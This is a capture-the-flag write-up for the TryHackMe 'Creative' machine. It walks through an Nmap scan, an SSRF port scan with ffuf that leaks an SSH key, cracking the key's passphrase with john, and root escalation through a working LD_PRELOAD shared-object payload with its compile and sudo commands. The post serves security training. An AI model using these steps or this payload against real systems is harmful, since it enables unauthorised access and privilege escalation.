Post

THM Creative

Posted Updated
By Phan Viet Hanh 1 min read

Creative

Summary

  • ‘beta’ subdomain
  • SSRF –> LFI
  • LPE with LD_Preload

NMAP

1
2
3
4
5
6
7
8
9
10
11
12
13

Nmap scan report for creative.thm (10.10.204.200)
Host is up (0.40s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
|   256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_  256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Creative Studio | Free Bootstrap 4.3.x template
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web Enumeration

The Nmap scan reveals only two ports: port 22, on which we have SSH, and port 80, a web server with nginx 1.18.0.
Nothing interesting on the web server.
Time to enumerate some subdomains creative.thm.
We find the subdomain beta.creative.thm.

Open `beta.creative.thm’

This site will test a URL. Command inject, SSRF, LFI is first things in my mind.

After trying some simple payloads. I found SSRF. Check port on 127.0.0.1

1

ffuf -w /opt/SecLists/Fuzzing/5-digits-00000-99999.txt -u http://beta.creative.thm/ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "url=http://127.0.0.1:FUZZ" -fw 3

After enumeration, we got the id_rsa file.

Login to SSH with this key. It requests a passphrase. :))
We will try to use ssh2john to crack the passphrase of ssh. (Almost in CTF, rockyou.txt is your friend)

1
2

ssh2john id_rsa > id_rsa.hash
/opt/john/run/john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

GOT USER.TXT FLAG

Privilege Escalation

Login as saad, we found creds in .bash_history.

Check sudo -l

/usr/bin/ping can run as root but no command is useful.
env_keep+=LD_PRELOAD we found an article written about LPE using LD_Preload

Create a shell.c

1
2
3
4
5
6
7
8
9

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

Compile it to generate a shared object with .so extension likewise .dll file in the Windows operating system and hence type the following:

1
2
3

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/tmp/shell.so sudo /usr/bin/ping

GOT ROOT.TXT FLAG

Write-up, THM
SSRF
This post is licensed under CC BY 4.0 by the author.